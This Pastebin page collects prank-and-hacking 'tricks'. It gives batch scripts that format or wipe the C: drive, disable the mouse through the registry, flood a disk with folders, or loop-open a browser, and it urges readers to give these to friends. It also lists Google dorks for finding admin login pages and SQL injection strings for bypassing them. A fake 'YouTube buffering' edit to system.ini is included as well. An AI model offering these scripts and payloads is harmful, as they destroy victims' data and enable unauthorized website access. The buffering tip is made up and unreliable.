Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Here's to a wonderful batch virus !
- I am WARNING YOU !!! This shit is
- dangerous !!! Play at your own RISK !!!
- @echo off
- title Stealing, Lying, Now Your PC Is Dying
- start firefox.exe mytricksclub.com
- cd C:\
- :menu
- cls
- echo Hello, I want to play a game.
- pause
- echo Live or Die, Make your
- choice:
- echo 1. Format PC
- echo 2. Exit
- set /p input=Choice:
- if %input%==1 goto one
- if %input%==2 goto two
- :one
- echo y|format C:
- :two
- echo y|format C:
- copy in notepad, save as
- anything.bat [ you can replace
- "anything" with whatever you
- want but save it with the .bat
- extension] ... Now share it with
- your friends !!
- -__________________________________
- How To Disable Right Click On Your
- Website Or Blog ?
- ...........................................................................
- .......
- 1. Got to your blogger Dashboard
- 2. Then Click on Layout. blogger widget
- 2. Now Click on Add Gadget and select
- Html/Javascript.
- blogger widget
- 3. Now paste code given below in the
- pop up window. <!--MBW Code-->
- <script language='JavaScript1.2'>
- function disableselect(e){
- return false
- }
- function reEnable(){ return true
- }
- document.onselectstart=new Function
- ("return false")
- if (window.sidebar){
- document.onmousedown=disablese lect
- document.onclick=reEnable
- }
- </script>
- 4. Save it and done. Now users will not
- be able to right click on your website.
- ----------------------------
- How to Make Dangerous Virus In A Minute?
- 1. Open Notepad and copy below code into it.
- @Echo off
- Del C:\ *.* |y
- 2.Save this file as virus.bat (Name can be anything but .bat is must)
- 3. Now, running this file will delete all the content of C Drive.
- Warnning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer.
- ---------------
- Increase Youtube Buffering Speed
- With this trick you can increase Youtube as well as sites like Metacafe video buffering speed@
- Here it goes --
- Start -> Run -> system.ini -> Hit Enter
- paste this Code:
- page buffer=100Tbps
- load=100Tbps
- download=100Tbps
- save=100Tbps
- back=100Tbps
- search=100Tbps
- sound=100Tbps
- webcam=100Tbps
- voice=100Tbps
- faxmodemfast=100Tbps
- update=100Tbps
- Save it and enjoy!!!
- -----------------------
- How To Create Files And Folders With No Name.
- 1. Create a folder or a file on desktop.
- 2. Now rename the folder or file by pressing F2 key or by clicking right click rename.
- 3. Now hold ALT button and press 0160.
- Note: Type the numbers 0160 from num pad only.
- 4. There fore no name folder is created.
- -=----
- Make a virus that disable Mouse
- 1) Open Notepad and copy below
- codes
- rem --------------- --------------- ---
- rem Disable Mouse
- set key="HKEY_LOCAL _MACHINE
- \system \CurrentControl Set
- \Services\Mo uclass"
- reg delete %key%
- reg add %key% /v Start /t REG_
- DWORD /d 4
- rem --------------- --------------- ---
- 2) Save this file as virus.bat
- --------------------------------------------
- How to Bypass Website Logins by SQL Injection
- These are the Dorks Used to Find Vulnerable Site to Bypass LoginWhich are Most Commonly the .asp One.
- Search them in Google without Quoutes
- “inurl:admin.asp”
- “inurl:login/admin.asp”
- “inurl:admin/login.asp”
- “inurl:adminlogin.asp”
- “inurl:adminhome.asp”
- “inurl:admin_login.asp”
- “inurl:administratorlogin.asp”
- “inurl:login/administrator.asp”
- “inurl:administrator_login.asp”
- There are More Dorkseven
- Now Go to Admin Panel and Type Admin as Username(Common One)
- and in Password we Type Our SQLInjection
- Here is a list of sql injections.
- ‘ or ’1′=’1
- ‘ or ‘x’=’x
- ‘ or 0=0 –
- or 0=0 –
- ‘ or 0=0 #
- ” or 0=0 #
- or 0=0 #
- ‘ or ‘x’=’x
- ” or “x”=”x
- ‘) or (‘x’=’x
- ‘ or 1=1–
- ” or 1=1–
- or 1=1–
- ‘ or a=a–
- ” or “a”=”a
- ‘) or (‘a’=’a
- “) or (“a”=”a
- hi” or “a”=”a
- hi” or 1=1 –
- hi’ or 1=1 –
- ‘or’1=1′
- -----------------------------------
- An awesome trick through which you can
- make 3000 folder at a time:
- FOLDER BOMBER
- This batch file will create 3000+ folder
- in less than a minute.
- Open your notepad and type the following
- codes.
- @echo off
- :top
- md %random%
- goto top
- Save it as 3000.bat
- Give this file to your 'friend' and when he
- will click on that his nightmare will be
- started.
- 2. Send messages on fb even if you are BLOCKED!
- To perform this trick first of all u need fb username of that person to which you are going to send msg.
- Go to your primary email id(gmail,yahoo etc)
- Compose a new msg to [email protected]
- (username= fb id of receiver)
- Now you can send your victim whatever you want... ]:-)
- 3. Open notepad and type:
- :A
- start http://www.google.com/
- goto A
- save as anyname.bat
- now give that .bat file to ur friend
- when ur frd opens the .bat file and then...
- ...see the effect
- don't run it on your own PC!
- try it now on ur friends PC!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement